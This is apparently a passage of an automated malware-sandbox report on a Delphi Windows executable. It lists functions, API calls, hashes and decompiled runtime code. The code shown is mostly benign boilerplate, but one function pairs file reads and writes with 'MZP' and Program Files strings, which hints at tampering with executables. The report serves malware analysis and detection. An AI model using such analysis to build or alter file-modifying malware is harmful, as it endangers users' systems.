                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                            • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                            • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                            • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004100D0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                              • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                              • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                              • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                              • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CopyImage$B380
                                                            • String ID: (
                                                            • API String ID: 1117845954-3887548279
                                                            • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                            • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                            • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                            • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410C68, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                              • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                              • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                              • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                              • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Attributes$CreatePointerReadWrite
                                                            • String ID: M$MZP$Z$\PROGRA~1\
                                                            • API String ID: 997383822-4093836345
                                                            • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                            • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                            • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                            • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040C9B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                            • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                            • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                            • MessageBoxA.USER32 ref: 0040CA28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleWrite$Message
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 1570097196-2970929446
                                                            • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                            • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                            • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                            • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}





                                                            0x00402f20
                                                            0x00402f80
                                                            0x00402f90
                                                            0x00402f90
                                                            0x00402f96
                                                            0x00402f22
                                                            0x00402f2b
                                                            0x00402f3b
                                                            0x00402f3b
                                                            0x00402f57
                                                            0x00402f78
                                                            0x00402f78

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                            • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                            • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                            • MessageBoxA.USER32 ref: 00402F90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleWrite$Message
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 1570097196-2970929446
                                                            • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                            • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                            • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                            • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040184C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x4809d0
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x47f4cc
					while(_t19 != 0x40a5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x47eeb8
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x47eeb8
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}










                                                            0x0040184d
                                                            0x00401857
                                                            0x0040192b
                                                            0x0040185d
                                                            0x0040185f
                                                            0x00401860
                                                            0x00401865
                                                            0x00401868
                                                            0x00401872
                                                            0x00401874
                                                            0x00401879
                                                            0x00401879
                                                            0x0040187e
                                                            0x00401885
                                                            0x0040188b
                                                            0x00401892
                                                            0x00401897
                                                            0x004018b1
                                                            0x004018aa
                                                            0x004018af
                                                            0x004018af
                                                            0x004018be
                                                            0x004018c8
                                                            0x004018d2
                                                            0x004018d7
                                                            0x004018de
                                                            0x004018e2
                                                            0x004018e9
                                                            0x004018ee
                                                            0x004018f3
                                                            0x004018f9
                                                            0x004018fc
                                                            0x004018ff
                                                            0x0040190b
                                                            0x0040190d
                                                            0x00401912
                                                            0x00401912
                                                            0x00401917
                                                            0x0040191c
                                                            0x00401921
                                                            0x00401921

                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                            • LocalFree.KERNEL32(004809D0,00000000,00401922), ref: 0040188B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004809D0,00000000,00401922), ref: 004018AA
                                                            • LocalFree.KERNEL32(0047EEB8,?,00000000,00008000,004809D0,00000000,00401922), ref: 004018E9
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 00401912
                                                            • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040191C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID:
                                                            • API String ID: 3782394904-0
                                                            • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                            • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                            • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                            • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B2E4, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                            • LocalFree.KERNEL32(004809D0,00000000,00401922), ref: 0040B323
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004809D0,00000000,00401922), ref: 0040B342
                                                            • LocalFree.KERNEL32(0047EEB8,?,00000000,00008000,004809D0,00000000,00401922), ref: 0040B381
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040B3AA
                                                            • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040B3B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID:
                                                            • API String ID: 3782394904-0
                                                            • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                            • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                            • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                            • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403D7D, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}





                                                            0x00403d7d
                                                            0x00403d82
                                                            0x00403d87
                                                            0x00403d89
                                                            0x00403d90
                                                            0x00403d9a
                                                            0x00403da4
                                                            0x00403dab
                                                            0x00403dbc
                                                            0x00403dbe
                                                            0x00403dbe
                                                            0x00403dc3
                                                            0x00403dc8
                                                            0x00403dd1
                                                            0x00403dda
                                                            0x00403de8
                                                            0x00403df2
                                                            0x00403e06
                                                            0x00403e3f
                                                            0x00403e08
                                                            0x00403e16
                                                            0x00403e2e
                                                            0x00403e18
                                                            0x00403e18
                                                            0x00403e18
                                                            0x00403e16
                                                            0x00403e44
                                                            0x00403e49
                                                            0x00403e4e

                                                            APIs
                                                              • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                              • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                            • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                            • GetVersion.KERNEL32 ref: 00403DF7
                                                            • GetVersion.KERNEL32 ref: 00403E08
                                                            • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                              • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                              • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                              • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                            • GetThreadLocale.KERNEL32 ref: 00403E24
                                                              • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3734044017-0
                                                            • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                            • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 65%
                                                            			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}












                                                            0x00402839
                                                            0x0040283b
                                                            0x00402845
                                                            0x00402861
                                                            0x004028b0
                                                            0x004028c2
                                                            0x004028c5
                                                            0x004028ce
                                                            0x00402863
                                                            0x00402865
                                                            0x00402866
                                                            0x0040286b
                                                            0x0040286e
                                                            0x00402871
                                                            0x0040288d
                                                            0x00402894
                                                            0x00402897
                                                            0x0040289a
                                                            0x004028a8
                                                            0x004028a8

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                            • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                            • API String ID: 3677997916-4173385793
                                                            • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                            • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040C2D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                            • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                            • API String ID: 3677997916-4173385793
                                                            • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                            • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B220, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID:
                                                            • API String ID: 730355536-0
                                                            • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                            • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                            • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                            • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}










                                                            0x00406520
                                                            0x00406527
                                                            0x0040652c
                                                            0x00406530
                                                            0x00406535
                                                            0x00406537
                                                            0x0040653c
                                                            0x00406540
                                                            0x00406551
                                                            0x0040655a
                                                            0x0040655d
                                                            0x00406563
                                                            0x00406566
                                                            0x00406566
                                                            0x0040656b
                                                            0x00406571
                                                            0x00000000
                                                            0x00406574
                                                            0x00406571
                                                            0x0040653c
                                                            0x0040657e

                                                            APIs
                                                              • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                            • GetIconInfo.USER32(?), ref: 00406540
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                            • DeleteObject.GDI32(?), ref: 00406566
                                                            • DeleteObject.GDI32(?), ref: 00406574
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Delete$CursorDestroyIconInfo
                                                            • String ID:
                                                            • API String ID: 3133107492-0
                                                            • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                            • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                            • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
